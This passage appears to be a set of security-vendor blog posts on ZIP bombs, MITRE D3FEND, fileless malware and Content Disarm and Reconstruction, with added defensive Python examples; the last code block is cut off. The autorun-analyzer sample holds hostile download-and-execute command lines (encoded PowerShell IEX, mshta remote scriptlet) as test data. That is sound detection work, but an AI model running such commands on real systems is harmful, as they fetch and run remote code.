

    Re-thinking About Your Endpoint Security Strategy Against New Threats

    August 4, 2023

    Target: Consumers

    Tags: Zero-Trust, Isolation, Policy, CDR, Trust No File

    On July 16, 2023, researchers at DOCGuard [1] uncovered an instance of a ZIP bomb malware attack. Although the file had been scanned by 61 detection engines on VirusTotal, only one initially flagged it as malicious. A ZIP bomb, colloquially known as a decompression bomb or "zip of death", is a malicious archive engineered to exhaust the resources of, and ideally crash, the program or system that attempts to open it. It is typically used to disable antivirus software, paving the way for additional malware to breach the system.

    At the time of writing, the detection ratio has improved only slightly, to 10 of 61 engines. No detection method is infallible or offers 100% accuracy, but this instance serves as a crucial reminder for security professionals: it highlights the persistent need for vigilance, and how critical it is to continually reassess and recalibrate endpoint security strategies in an era where threats are both diverse and highly sophisticated. The ZIP bomb is just one case; many other evasive attacks, delivered in a variety of file formats, target the endpoint. They may arrive through browsing, file downloads, file sharing, removable media, and email messages.

    The Problem with Malware Detection

    Malware detection relies on identifying known patterns, signatures and behaviors associated with malware, and may use advanced Artificial Intelligence (AI) detection engines. This model struggles with newer and more innovative forms of malware that are designed to evade detection. The ZIP bomb mentioned above is a prime example: a harmful payload is disguised or hidden within a compressed file, and a scanner that inflates the archive in order to inspect it becomes the victim. This highlights the need to move away from sole reliance on detection-based defenses toward proactive, isolation-oriented defenses, and to add them to the security stack.
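    The check below is an added example for this post, not code from DOCGuard or BUFFERZONE. It triages an archive from its central directory (declared sizes, compression ratio, entry count, member paths) before inflating anything, and then enforces a byte budget while streaming each member, which also catches headers that under-report their sizes. The limits are assumptions to be tuned per deployment, and the sample archives are constructed in the code.

```python
import io
import zipfile
from pathlib import PurePosixPath

# Policy limits. The numbers are assumptions for this example; tune them per deployment.
MAX_TOTAL_UNCOMPRESSED = 64 * 1024 * 1024  # declared (and actual) output budget, bytes
MAX_RATIO = 100                              # uncompressed:compressed ceiling per archive
MAX_ENTRIES = 10_000
CHUNK = 64 * 1024


def build_sample_archive(payload, name="payload.bin"):
    """Constructed sample input: a one-member archive. Long runs of identical
    bytes deflate at roughly 1000:1, which is all a simple bomb needs."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(name, payload)
    return buf.getvalue()


def precheck_zip(data, max_total=MAX_TOTAL_UNCOMPRESSED, max_ratio=MAX_RATIO):
    """Header-only triage: decide from the central directory, before inflating
    a single byte. Returns (ok, reason)."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile as exc:
        return False, f"not a zip archive: {exc}"
    with zf:
        infos = zf.infolist()
    if len(infos) > MAX_ENTRIES:
        return False, f"too many entries: {len(infos)}"
    total_u = sum(i.file_size for i in infos)
    total_c = sum(i.compress_size for i in infos)
    if total_u > max_total:
        return False, f"declared uncompressed size {total_u} exceeds budget {max_total}"
    if total_c and total_u / total_c > max_ratio:
        return False, f"compression ratio {total_u / total_c:.0f}:1 exceeds {max_ratio}:1"
    for i in infos:  # while we are here, refuse zip-slip style member names too
        if i.filename.startswith(("/", "\\")) or ".." in PurePosixPath(i.filename).parts:
            return False, f"unsafe member path: {i.filename!r}"
    return True, "ok"


def extract_with_budget(data, max_total=MAX_TOTAL_UNCOMPRESSED):
    """Inflate members in bounded chunks and count the real output, so an
    archive whose headers under-report file_size is still stopped. The data is
    discarded here; a real pipeline would stream each chunk to the next stage
    (CDR, AV) instead. Returns (ok, bytes_inflated, reason)."""
    inflated = 0
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            with zf.open(info) as member:
                while chunk := member.read(CHUNK):
                    inflated += len(chunk)
                    if inflated > max_total:
                        return False, inflated, f"inflated output exceeded budget {max_total}"
    return True, inflated, "ok"
```

    A nested bomb (an archive whose members are themselves archives) is handled by applying precheck_zip recursively to each member that passes, with a depth limit; that recursion is left out here. The two checks are complementary: the header pass is free and rejects the obvious cases, while the budgeted inflate is what actually protects the scanner, because nothing in the central directory has to be true.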

    Introducing Application Isolation and Advanced Policy

    Endpoint security has seen a transformative approach through the introduction of application isolation, a method deeply rooted in the zero-trust model. This strategy aims to quarantine individual applications or programs from the broader system environment, effectively containing any potential threats and preventing their interaction with other “trusted” applications within the organization or the underlying system. This significantly curtails the possible ramifications of a security breach.

    Consider, for instance, a web browser operating within this isolated environment. In a web-based attack, malicious activity is restricted to this isolated sphere, preventing any spread to the operating system or other applications. Therefore, even if a piece of malware like a ZIP bomb eludes initial detection, the damage it can inflict is confined to the isolated environment. One practical caveat: a decompression bomb is a resource-exhaustion attack, so the container must also bound the disk space and CPU time an isolated process may consume; otherwise the host can still be degraded even though nothing escapes.

    Underpinning this approach is the integral role of endpoint security policies. These policies shrink the attack surface, reducing the areas where an organization is exposed to cyber threats. For example, application control settings can be employed as a proactive defense, limiting the types of applications users can run and controlling the code that executes in the system's core, the kernel. This regulation of application behavior minimizes overall exposure to potential threats. Furthermore, the BUFFERZONE proprietary firewall controls the endpoint's network communication.

    Taking this a step further, policies such as those provided by BUFFERZONE allow even greater specificity and control. For instance, they can permit installation only of executables signed with a specific verified certificate, enabling Microsoft's own applications while denying others, or block all user-downloaded applications altogether. This nuanced approach to application isolation further elevates the effectiveness of endpoint security.

    Summary

    In conclusion, given the rapidly evolving nature of cyber threats, adopting a security strategy that combines robust policy enforcement with application isolation is an effective approach. It allows an organization to not only defend against known threats but also mitigate the potential impact of unknown threats that evade traditional detection methods. This combination shifts the security paradigm from reactive detection to proactive containment, providing a more resilient defense against emerging threats.

    References

    [1] DOCGuard, Zip Bomb Analysis.

    BUFFERZONE® Safe Workspace® Prevention and Protection In MITRE® D3FEND™ Framework

    July 17, 2023

    Target: Consumers

    Tags:  MITRE® D3FEND™, MITRE® ATT&CK™, Safe Workspace®, CDR, Isolation

    In the ever-evolving landscape of cybersecurity, frameworks play a vital role in understanding and explaining how to defend against adversarial tactics and techniques. Two prominent frameworks, MITRE ATT&CK™ and MITRE D3FEND™, provide comprehensive insights into offensive and defensive cybersecurity strategies. This article delves into what MITRE® D3FEND™ [1] (version 0.12.0-BETA-2) is and explores its relationship with the previously discussed MITRE ATT&CK framework [2]. By understanding these frameworks and their interconnections, organizations can develop more robust and effective cybersecurity strategies.

    This blog will focus on how BUFFERZONE® Safe Workspace® prevention and protection capabilities are mapped in the MITRE D3FEND framework.

    MITRE ATT&CK:

    MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK) is a well-established framework focusing on offensive cybersecurity. It provides comprehensive information on the tactics, techniques, and procedures (TTPs) commonly used by adversaries to breach networks and compromise systems [2].

    ATT&CK offers a knowledge base and a matrix that categorizes adversary behavior and maps it to various stages of an attack lifecycle [2]. The framework covers various platforms, including Windows, Linux, macOS, mobile devices, cloud-based systems, and industrial control systems [3]. It categorizes TTPs into tactics, techniques, sub-techniques, and documented adversary usage, providing a detailed taxonomy for offensive cybersecurity. The ATT&CK Matrix visualizes the relationships between tactics, techniques, and sub-techniques, enabling organizations to understand the different phases of an attack and associated tactics.

    By utilizing ATT&CK, organizations can evaluate common adversary behavior, identify potential vulnerabilities in their systems, and enhance their cybersecurity strategies [2].

    What is MITRE D3FEND?

    MITRE D3FEND, short for Detection, Denial, and Disruption Framework Empowering Network Defense, is a knowledge graph released by MITRE to establish a common language and framework for cybersecurity defenders [1]. It is a companion project to the well-known MITRE ATT&CK framework but with a distinct focus on defensive techniques and countermeasures. While MITRE ATT&CK provides a comprehensive understanding of adversarial tactics, techniques, and common knowledge, D3FEND aims to categorize and illuminate the defensive methods employed by cybersecurity professionals [1].

    Understanding the Relationship between MITRE ATT&CK and MITRE D3FEND

    While MITRE ATT&CK focuses on the offensive tactics and techniques adversaries use to breach networks, D3FEND concentrates on defensive strategies and countermeasures [1]. The D3FEND framework establishes terminology and vocabulary for defensive techniques and sheds light on the relationships between defensive and offensive methods [2].

    By using both frameworks together, cybersecurity professionals gain a comprehensive understanding of the full spectrum of cyber threats and of effective defensive strategies. The ATT&CK matrix visualizes the phases of an adversary's attack lifecycle and provides insight into offensive tactics and techniques, while the D3FEND knowledge graph complements it by offering a vocabulary of defensive methods and countermeasures [3].

    BUFFERZONE Safe Workspace® D3FEND Protection Mapping

    The MITRE D3FEND framework (in the version discussed here) organizes defensive cybersecurity techniques into five tactics, or stages of defense:

    • Harden: This category focuses on hardening the security of applications, platforms, credentials, and messages. Techniques under this category include application hardening, platform hardening, credential hardening, and message hardening [1].
    • Detect: The detect category involves techniques for detecting potential threats and malicious activities. It includes network traffic analysis, process analysis, file analysis, platform monitoring, identifier analysis, message analysis, and user behavior analysis.
    • Isolate: Techniques under the Isolate category aim to isolate or contain threats within the network. This includes network isolation and execution isolation methods.
    • Deceive: The deceive category involves techniques used to mislead or deceive adversaries. This can be achieved through the creation of decoy environments or decoy objects.
    • Evict: The evict category focuses on techniques to evict or remove adversaries from the network. It includes credential eviction and process eviction methods.

    D3FEND’s defensive techniques are linked to MITRE ATT&CK techniques and the artifacts they produce, offering a comprehensive understanding of the connection between defensive and offensive methods [1]. BUFFERZONE® Safe Workspace® is a suite of preventive tools that rely on application isolation technology. It includes Safe Browsing, SafeBridge® (with Content Disarm and Reconstruction (CDR) capabilities), and Safe Removable (for USB attack prevention), all equipped with clipboard security. The Safe Workspace® virtual container is created by a kernel driver, which divides the operating system into two logical areas.

    The first area, referred to as the trusted zone, is connected to all the organization’s networks and files within the operating system. The untrusted zone, the second area, acts as a buffer where various applications can securely operate, isolated from the trusted zone’s memory, files, registry, and processes.

    This approach has numerous benefits, including minimal CPU and memory usage, a high-quality user experience, and the ability to work seamlessly within the virtual container while remaining unaware of the protective shield against browsing and USB threats. The following sections will explain how each suite product prevents various attack risks.

    The following tables summarize the techniques we support under each tactic; techniques we do not support are omitted for simplicity and readability. For further reading, we suggest visiting the MITRE D3FEND website.

    Harden

    Credential Hardening: Certificate-Based Authentication; Multifactor Authentication; Domain Trust Policy
    Message Hardening: Message Encryption; Transfer Agent Authentication
    Platform Hardening: Driver Load Integrity Check; Local File Permissions; Software Updates

     

    • Credential Hardening:
      • Certificate-Based Authentication – The BUFFERZONE Passport zone-management option configures endpoint browsing sessions so that the organizational proxy can identify them as originating from contained applications, enabling the proxy to block all outbound communications that do not come from contained browsers. When Passport enforcement is enabled, browser requests carry a header containing an encrypted shared secret, which the proxy checks before acting. When a user attempts to connect to an untrusted site (the internet) from an uncontained browsing session, the BUFFERZONE agent detects the proxy block and switches to a contained session.
      • Multi-Factor Authentication (MFA) – Users can securely log in to Microsoft Windows through Azure MFA, enforced by the BUFFERZONE kernel agent, which manages the Windows user login process. We do not provide any other authentication mechanism for other applications at this stage.
      • Domain Trust Policy – When using BUFFERZONE Safe Browsing, a zone-switch function determines whether a website is opened inside the virtual container (untrusted zone) or in the trusted zone. The decision is based on the organization's domain trust policy.
    • Message Hardening:
      • Message Encryption – The BUFFERZONE anti-phishing extension alerts on the use of insecure (unencrypted) browsing protocols (from version 2.0).
      • Transfer Agent Authentication – Covered by the same anti-phishing extension check on insecure browsing protocols (from version 2.0).
    • Platform Hardening:
      • Driver Load Integrity Checking – For file installation, BUFFERZONE can, based on administrator policy, define which applications may be installed; for example, it can require that only executables signed with an authentic Microsoft certificate are installed.
      • Local File Permissions – BUFFERZONE categorizes local files according to whether they may be used in the trusted or the untrusted zone. To move a file from the untrusted to the trusted zone, a Content Disarm and Reconstruction (CDR) pass is mandatory, ensuring that no potential threat enters the trusted zone. File transfers from the trusted zone to the untrusted zone are blocked outright.
      • Software Updates – BUFFERZONE Safe Workspace® hardens the operating system (OS) in two ways. First, it verifies that the OS version is supported and patched. Second, it watches for new updates to the software installed within the virtual container and notifies the user when one is available.

    Detect

    BUFFERZONE Safe Workspace® is a zero-trust prevention product based on application isolation and Content Disarm and Reconstruction (CDR). Recently we added anti-phishing detection for the Chrome browser. The following describes our contribution in the Detect category.

    File Analysis: Dynamic Analysis; File Content Rules
    Identifier Analysis: Homoglyphs Detection; URL Analysis
    Network Traffic Analysis: Certificate Analysis; Administrative Network Analysis; Blocking based on Policy; RPC Traffic Analysis
    Platform Monitoring: Operating System Monitoring; Endpoint Health Beacon
    Process Analysis: Process Spawn Analysis; Script Execution Analysis; System Call Analysis; File Creation Analysis

     

    • File Analysis – BUFFERZONE SafeBridge® is a file analysis tool with two key features. First, it has a local Content Disarm and Reconstruction (CDR) engine that functions without any internet connection. Second, it acts as a file connector to third-party detection engines and sandboxing solutions. Using a central management system to set file policies and configurations, it analyzes files obtained from removable storage, web browsing, and downloads.
      • Dynamic Analysis and Static Analysis – SafeBridge provides third-party detection connectors to various vendors' dynamic and static analysis engines.
      • File Content Rules – Based on the file type, BUFFERZONE enforces different file handling policies as part of SafeBridge.
    • Identifier Analysis – BUFFERZONE's Artificial Intelligence (AI) and threat intelligence engines protect user browsing activity. They use techniques such as URL analysis, homoglyph detection, and dynamic analysis of domain, host, and IP through a URL sandbox and threat reputation.
      • Homoglyphs Detection – AI-based homoglyph detection.
      • URL Analysis – We provide dynamic, static, and AI-based detection for URL analysis. Our AI covers URL analysis, threat intelligence, object detection, and website fingerprinting.
    • Network Traffic Analysis:
      • Certificate Analysis – Based on BUFFERZONE Passport.
      • Administrative Network Traffic Analysis – The BUFFERZONE proprietary firewall can, based on administrator policy, be configured to block various protocols, including TeamViewer. Note that BUFFERZONE does not perform heuristic analysis of network traffic.
      • Blocking Based on Policy – BUFFERZONE central management enables network protocol blocking.
      • RPC Traffic Analysis – BUFFERZONE manages and monitors RPC traffic within the virtual container. Because RPC is a difficult attack vector to prevent, the BUFFERZONE kernel driver controls the untrusted container, blocking exploitation attempts over RPC inside the container and attempts to escape it.
    • Platform Monitoring:
      • Operating System Monitoring – The BUFFERZONE agent oversees the virtual container's processes, tracks file usage, and sends the resulting data to a syslog server for monitoring by the SIEM/SOC.
      • Endpoint Health Beacon – We collaborate with Absolute® to implement Application Persistence-as-a-Service (APaaS). This firmware-level solution ensures that endpoint health is continuously monitored and that application persistence is automatically managed.
    • Process Analysis:
      • Process Spawn Analysis – BUFFERZONE blocks unauthorized processes that may be used for malicious purposes, such as DDE, RPC, svchost, shells, and script interpreters, from running within the virtual container; only authorized processes are permitted inside it. BUFFERZONE also monitors process activity and exports it to syslog for further analysis.
      • Script Execution Analysis – BUFFERZONE prevents scripts from running inside the virtual container and logs the attempts.
      • System Call Analysis – The BUFFERZONE agent analyzes system calls and processes and isolates the system calls that belong to the untrusted (isolated) zone.
      • File Creation Analysis – The BUFFERZONE agent monitors all file creations, reports them to syslog, and ensures full isolation between the trusted and untrusted zones.

    Isolate

    The core of BUFFERZONE Safe Workspace is application isolation. MITRE D3FEND defines two categories of isolation: Network Isolation and Execution Isolation.

    Network Isolation: Network Traffic Filtering; Homoglyphs Denylisting
    Execution Isolation: Executables Allowlist; Executables Blocklist; Kernel-Based Isolation; Mandatory Access Control; System Call Filtering

    • Execution Isolation:
      • Executables Allowlist – Safe Workspace controls execution and, based on policy-driven configuration, can permit installation of executables according to a defined application or executable certificate.
      • Executables Blocklist – Safe Workspace controls execution and, based on policy-driven configuration, can deny installation of executables according to a defined application or executable certificate.
      • Kernel-Based Isolation – The core technology of BUFFERZONE is based on six patents focused on application and network isolation.
      • Mandatory Access Control – The BUFFERZONE kernel agent defines policy-based access control for applications, the network, and files.
      • System Call Filtering – The BUFFERZONE agent controls system calls and isolates them between the trusted and untrusted environments.
    • Network Isolation:
      • Network Traffic Filtering – Safe Workspace controls inbound and outbound traffic through a proprietary policy-driven firewall.
      • Homoglyphs Denylisting – BUFFERZONE anti-phishing detects homoglyphs at the URL level.
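    The following is an added example, not BUFFERZONE code, of the two decisions this post describes: the zone-switch choice under Domain Trust Policy (Harden), and the homoglyph checks under Homoglyphs Detection (Detect) and Homoglyphs Denylisting (Isolate). The trusted-domain list, the suffix-matching rule and the script-mixing heuristic are assumptions for the example, and the hostnames used are documentation names.

```python
import unicodedata
from urllib.parse import urlsplit

# Hypothetical domain trust policy (an assumption for this example): a host is
# trusted if it equals an entry or is a subdomain of one. Everything else,
# including lookalikes of these names, is opened in the contained zone.
TRUSTED_DOMAINS = {"example.com", "intranet.example.net"}


def host_of(url):
    """Lowercase hostname of a URL; bare hostnames are accepted as well."""
    if "://" not in url:
        url = "https://" + url
    return (urlsplit(url).hostname or "").rstrip(".").lower()


def scripts_in(label):
    """Unicode script families of the letters in one DNS label, e.g. {'LATIN'}."""
    return {unicodedata.name(ch, "?").split(" ")[0] for ch in label if ch.isalpha()}


def homoglyph_findings(host):
    """Cheap homoglyph checks: punycode (IDNA) labels, labels mixing scripts,
    and labels written entirely in a non-Latin script. A policy that allows
    legitimate IDNs would keep an allowlist instead of the last rule."""
    findings = []
    for label in host.split("."):
        shown = label
        if label.startswith("xn--"):
            try:
                shown = label.encode("ascii").decode("idna")
            except UnicodeError:
                shown = "<undecodable>"
            findings.append(f"punycode label {label} decodes to {shown!r}")
        scripts = scripts_in(shown)
        if len(scripts) > 1:
            findings.append(f"mixed scripts in {shown!r}: {sorted(scripts)}")
        elif scripts and scripts != {"LATIN"}:
            findings.append(f"non-Latin label {shown!r}: {sorted(scripts)}")
    return findings


def decide_zone(url, trusted=TRUSTED_DOMAINS):
    """Zone-switch decision: ('trusted' | 'untrusted', reason). Fails closed:
    anything not explicitly trusted, or that looks like a lookalike, is contained."""
    host = host_of(url)
    if not host:
        return "untrusted", "no hostname"
    findings = homoglyph_findings(host)
    if findings:
        return "untrusted", "; ".join(findings)
    labels = host.split(".")
    for i in range(len(labels)):          # match label suffixes, never substrings
        candidate = ".".join(labels[i:])
        if candidate in trusted:
            return "trusted", f"matches policy entry {candidate}"
    return "untrusted", "not in domain trust policy"
```

    Two details matter in practice. Matching is done on whole label suffixes, so example.com.evil.net and notexample.com never match example.com. And the lookalike checks run before the policy lookup, so a homoglyph of a trusted name can never be routed to the trusted zone by accident; the user still gets the page, but inside the container.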

    Evict

    Account Locking – BUFFERZONE MFA is integrated with Active Directory and can lock a user out of the device. The device can also be isolated from the network by blocking incoming and outgoing traffic.

    Process Eviction –

    • Process Termination – BUFFERZONE regulates the processes that run within the virtual container and manages them according to the established policies.

    Summary

    In conclusion, companies should integrate the MITRE D3FEND and MITRE ATT&CK frameworks into their cybersecurity plans to gain a thorough understanding of both offensive and defensive tactics. By utilizing MITRE D3FEND, organizations can identify their safeguarded attack vectors and take necessary measures to enhance protection. BUFFERZONE Safe Workspace® provides a comprehensive application isolation solution for secure browsing and protection against evasive files from removable media and online activities, making it the perfect choice for companies serious about cybersecurity.

    References

    [1] MITRE® D3FEND™ Knowledge Graph, https://d3fend.mitre.org/

    [2] MITRE® ATT&CK™, https://attack.mitre.org/

    Fileless Malware Attacks Are on the Rise- But Do not Worry

    July 6, 2023

    Target: Consumers

    Tags: Fileless Malware, Bypass antivirus, Isolation, CDR

    The cybersecurity arena saw significant change in 2020, marked by a substantial rise in fileless malware attacks: the rate grew by 900% over the previous year [1]. A more recent study from Aqua Security reports a 1,400% increase in 2022 in fileless or memory-based attacks that exploit pre-existing software, applications, and protocols [2]. This surge highlights the increasing complexity of cyber threats and underscores the urgent need for stronger security mechanisms to ward off such attacks.

    What is a fileless attack?

    Unlike conventional malware, fileless malware does not depend on executable files to perform its harmful activities. Rather, it operates within the system’s memory, eluding detection systems based on signatures that track file actions. This attribute significantly enhances the potency of fileless malware as it can smoothly slip past numerous antivirus solutions [3].

    The ability of fileless malware to remain undetected and maintain persistence makes it particularly hazardous. It can penetrate a system through a single click on a malicious link or a visit to a compromised website, presenting a substantial challenge to standard endpoint protection [1]. It compromises the system by exploiting programs that are typically considered safe and allowlisted by administrators. Because no file is written to disk during infection, fileless malware is harder to identify than traditional malware: it evades the on-disk file scans performed by conventional antivirus tools.

    Notably, the infection process of fileless malware begins when a user, deceived by social engineering methods, clicks on a malicious link or attachment, often delivered through a phishing email [4]. The malware then invades the system and begins to propagate from one device to another.

    This implies that a fileless malware attack is part of a larger sequence of cyberattacks. To avert such an attack, it is essential to obstruct the initial attack vectors that trigger it.

     

    There are three primary types of fileless malware attack: memory code injection, manipulation of the Windows registry [4], and abuse of Windows services such as Windows Management Instrumentation (WMI).

    Memory code injection attacks involve hiding malicious code within the memory of trustworthy applications, typically exploiting weaknesses in software like Flash, Java, or web browsers. The malware operates its code inside these legitimate processes [4].

    Conversely, Windows registry manipulation attacks occur when an attacker uses a malicious link or file to subvert a trusted Windows process. Once the user opens the link or file, that process is used to write and run fileless code stored in the registry. These attacks can effectively dodge detection by conventional antivirus software [4]. The third type stores malicious code in WMI's CIM repository, typically as a permanent event subscription whose trigger, such as system boot, causes a legitimate WMI host process to run the code. The CIM repository itself resides on disk, but the code is well hidden inside it [5].

    A further feature of fileless malware is its reliance on command lines, the instruction strings passed to legitimate programs such as PowerShell, rather than on dropped files. Because no unusual file is associated with the threat, traditional antivirus software often overlooks it [4].
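    As an added example, not part of the original post and not any vendor's detection logic, here is a small analyzer for the registry-resident variant described above: it inspects autorun (Run key) values for living-off-the-land interpreters, decodes PowerShell -EncodedCommand payloads so indicators inside them can be matched, and flags commands that read their script body back out of the registry. The sample values and the indicator patterns are constructed for the example; 203.0.113.5 is a documentation address and the Corp key is invented.

```python
import base64
import re

# Living-off-the-land binaries that should rarely appear in a Run value.
LOLBINS = {"powershell", "pwsh", "mshta", "wscript", "cscript", "regsvr32",
           "rundll32", "certutil", "bitsadmin", "wmic", "cmd"}

# Indicator patterns (assumptions for this example, not a vendor rule set).
INDICATORS = [
    (re.compile(r"-(?:e|ec|en|enc|encodedcommand)\b", re.I), "encoded PowerShell command"),
    (re.compile(r"-(?:nop|noprofile)\b", re.I), "PowerShell profile bypass"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I), "hidden window"),
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), "Invoke-Expression"),
    (re.compile(r"\b(?:gp|get-itemproperty)\b[^|]*\bhk(?:cu|lm)\b", re.I), "reads script body from registry"),
    (re.compile(r"\b(?:javascript|vbscript):", re.I), "script protocol handler"),
    (re.compile(r"https?://", re.I), "remote URL in autorun"),
]


def encode_ps(script):
    """Encode a script the way 'powershell -EncodedCommand' expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample of autorun values (value name -> command line), as they
# would be read from HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
SAMPLE_RUN_VALUES = {
    "OneDrive": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "Updater": "powershell.exe -NoP -W Hidden -enc "
               + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a')"),
    "Helper": 'mshta.exe "javascript:GetObject(\'script:http://203.0.113.5/x.sct\');close()"',
    "Loader": r'powershell.exe -nop -w hidden -c "iex (gp HKCU:\Software\Corp).Script"',
}


def first_token(cmd):
    """Basename of the launched program, without quotes, path or .exe."""
    m = re.match(r'\s*"([^"]+)"|\s*(\S+)', cmd)
    path = (m.group(1) or m.group(2)) if m else ""
    name = re.split(r"[\\/]", path)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def decode_encoded_command(cmd):
    """Return the decoded script if the command carries -enc/-e <base64>, else None."""
    m = re.search(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmd, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_autorun(cmd):
    """Findings for one autorun command line; an empty list means nothing matched."""
    findings = []
    exe = first_token(cmd)
    if exe in LOLBINS:
        findings.append(f"{exe} launched from autorun")
    decoded = decode_encoded_command(cmd)
    text = cmd
    if decoded is not None:
        findings.append("decoded payload: " + decoded.strip())
        text += "\n" + decoded          # match indicators inside the payload too
    findings += [label for pattern, label in INDICATORS if pattern.search(text)]
    return findings


def scan_run_values(values):
    """Map each suspicious value name to its findings; clean values are omitted."""
    return {name: f for name, cmd in values.items() if (f := analyze_autorun(cmd))}
```

    On a live host the same analysis would be fed from the Run, RunOnce and Winlogon keys under both HKCU and HKLM, plus scheduled tasks and WMI subscriptions; the point of decoding the payload first is that the interesting strings (the download URL, the Invoke-Expression) are invisible in the raw value.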

    How to stop Fileless attacks

    To counter these threats, it is vital to keep software updated, particularly Microsoft applications. Microsoft has stepped up security in recent Windows versions and improved Windows Defender to spot abnormal PowerShell activity, including script content exposed at run time through the Antimalware Scan Interface (AMSI). Endpoint Detection and Response (EDR) vendors have also put forward detection solutions to avert these attacks.

    However, detection is complex, and malware authors can test their attacks against these defenses before launch, so existing security measures can be circumvented. Consequently, our recommendation is to employ a zero-trust prevention strategy.

    BUFFERZONE® Safe Workspace® is an extensive collection of preventive tools underpinned by application isolation technology. It includes Safe Browsing, SafeBridge® (equipped with Content Disarm and Reconstruction (CDR) capabilities), and Safe Removable (aimed at preventing USB attacks), all reinforced with clipboard security. A kernel driver establishes the Safe Workspace® virtual container, effectively splitting the operating system into two distinct sections.

    The first section, referred to as the trusted zone, connects to all the organization’s networks and the operating system’s files. The second section, the untrusted zone, acts as a buffer, providing a safe space for various applications to operate independently from the trusted zone’s memory, files, registry, and processes.

    This avant-garde strategy offers numerous advantages, such as minimal CPU and memory usage, superior user experience, and the capacity to operate smoothly within the virtual container, all while being shielded from browsing and USB threats.

    BUFFERZONE® is a single virtual containment solution that leverages six patented technologies. Safe Workspace® provides protection from phishing attacks, harmful downloads, and potentially risky email attachments and links (via an Outlook extension). We believe that security should be simple and accessible to the user.


    References:

    [1] New Research: Fileless Malware Attacks Surge by 900% and Cryptominers Make a Comeback, While Ransomware Attacks Decline, WatchGuard Technologies, Inc , https://www.globenewswire.com/en/news-release/2021/03/30/2201173/0/en/New-Research-Fileless-Malware-Attacks-Surge-by-900-and-Cryptominers-Make-a-Comeback-While-Ransomware-Attacks-Decline.html

    [2] Michael Hill, Fileless attacks surge as cybercriminals evade cloud security defenses,

    https://www.csoonline.com/article/643356/fileless-attacks-surge-as-cybercriminals-evade-cloud-security-defenses.html

    [3] An emerging threat Fileless malware: a survey and research challenges, Kumar, Sushil, and others, https://cybersecurity.springeropen.com/articles/10.1186/s42400-019-0043-x

    [4] What is Fileless Malware, Fortinet,  https://www.fortinet.com/resources/cyberglossary/fileless-malware

    [5] Nick Ismail , Defending against fileless malware, https://www.information-age.com/defending-fileless-malware-6282/

     

     

    What Is Content Disarm and Reconstruction?

    May 4, 2023

    Tags: Malware Analysis, CDR, Zero-Trust, Detection 

    Audience Tag: Feature Spotlight 

    Over 92% of cyber-attacks start with seemingly harmless emails or links. According to a report [1], the number of new malicious files per day has increased by 5.7%, reaching a staggering 380,000. With detection methods not being 100% foolproof, a new approach to file security is urgently needed.

    The ever-increasing volume of malicious files being circulated poses a significant threat to organizations. Cybercriminals are constantly finding new ways to disguise malware and evade detection, making it crucial for organizations to adopt advanced security measures. Relying solely on traditional antivirus software and other conventional security measures may not provide adequate protection against these rapidly evolving threats. 

    To combat this growing menace effectively, organizations need solutions that reduce the attack surface, and Content Disarm and Reconstruction (CDR) is one such solution. CDR takes a proactive approach: it dissects files and documents, analyzes their components, and reconstructs them without the potentially harmful elements. By neutralizing threats in files whether or not they are detected, CDR helps prevent malware from infiltrating systems through evasive lure emails, links, or file attachments.

    In the following Figure we can observe a typical file that contains different attack vectors. 

    Fig. 1 Typical document illustration that contains attack vectors [2]. 

     The attack vectors may be hyperlinks, macros, known exploits, images and other media components. 
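    To make the disarm step concrete, here is an added example, not BUFFERZONE's SafeBridge code, that performs CDR on two of the vectors named above for a Word document: it removes the VBA project and relabels the package as macro-free, and it strips external hyperlinks while keeping their visible text. Office Open XML packages are ZIP files of XML parts, so the whole job is a package rewrite. The macro-enabled input is constructed inline with a stand-in vbaProject.bin (not real VBA) and a documentation address; exploit and image handling need per-format parsers and are not shown.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

CT_NS = "http://schemas.openxmlformats.org/package/2006/content-types"
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
VBA_REL = "http://schemas.microsoft.com/office/2006/relationships/vbaProject"
HYPERLINK_REL = R_NS + "/hyperlink"
MACRO_MAIN_CT = "application/vnd.ms-word.document.macroEnabled.main+xml"
PLAIN_MAIN_CT = "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"
VBA_CT = "application/vnd.ms-office.vbaProject"
ET.register_namespace("w", W_NS)
ET.register_namespace("r", R_NS)


def build_sample_docm():
    """Constructed input: a minimal macro-enabled document with one paragraph,
    an external hyperlink and a stand-in vbaProject.bin (not real VBA)."""
    content_types = (f'<Types xmlns="{CT_NS}">'
        '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
        '<Default Extension="xml" ContentType="application/xml"/>'
        f'<Default Extension="bin" ContentType="{VBA_CT}"/>'
        f'<Override PartName="/word/document.xml" ContentType="{MACRO_MAIN_CT}"/></Types>')
    rels = (f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{VBA_REL}" Target="vbaProject.bin"/>'
        f'<Relationship Id="rId2" Type="{HYPERLINK_REL}" Target="http://203.0.113.5/lure" TargetMode="External"/>'
        '</Relationships>')
    document = (f'<w:document xmlns:w="{W_NS}" xmlns:r="{R_NS}"><w:body><w:p>'
        '<w:r><w:t>Invoice attached. </w:t></w:r>'
        '<w:hyperlink r:id="rId2"><w:r><w:t>View online</w:t></w:r></w:hyperlink>'
        '</w:p></w:body></w:document>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
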